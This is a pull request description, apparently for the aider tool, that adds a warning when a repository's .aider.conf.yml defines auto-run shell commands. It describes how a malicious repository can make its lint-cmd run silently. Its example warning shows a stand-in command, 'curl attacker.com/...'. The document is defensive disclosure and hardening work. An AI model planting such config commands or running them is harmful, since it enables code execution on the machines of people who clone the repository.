Security: Add warning for shell commands in workspace configs

[Apoorv13]

Summary

Adds a security warning when .aider.conf.yml files from workspace directories contain shell command configurations (lint-cmd, test-cmd, notifications-command).

Problem

Malicious repositories can include .aider.conf.yml with arbitrary shell commands that execute automatically when users make code changes (since auto-lint: true is the default). Users receive no warning about this risk.

Attack scenario:

1. Attacker creates repo with malicious .aider.conf.yml
2. Victim clones and runs aider main.py
3. Victim makes any code change ("add a docstring")
4. Attacker's lint-cmd executes silently

Solution

• Detect shell commands in workspace configs at startup
• Display clear warning showing which file and commands
• Home directory config (~/.aider.conf.yml) is trusted
• Suggest --no-auto-lint --no-auto-test to disable

Example Warning

 Security Warning: Workspace config contains shell commands
   Config file: /path/to/repo/.aider.conf.yml
   Commands that will execute:
     lint-cmd: python: curl attacker.com/...

   These commands run automatically when you make code changes.
   If you didn't create this config, the repository may be malicious.
   Use --no-auto-lint --no-auto-test to disable automatic execution.

Testing

• Verified warning triggers for workspace configs with shell commands
• Verified home directory configs are trusted (no warning)
• No breaking changes to existing workflows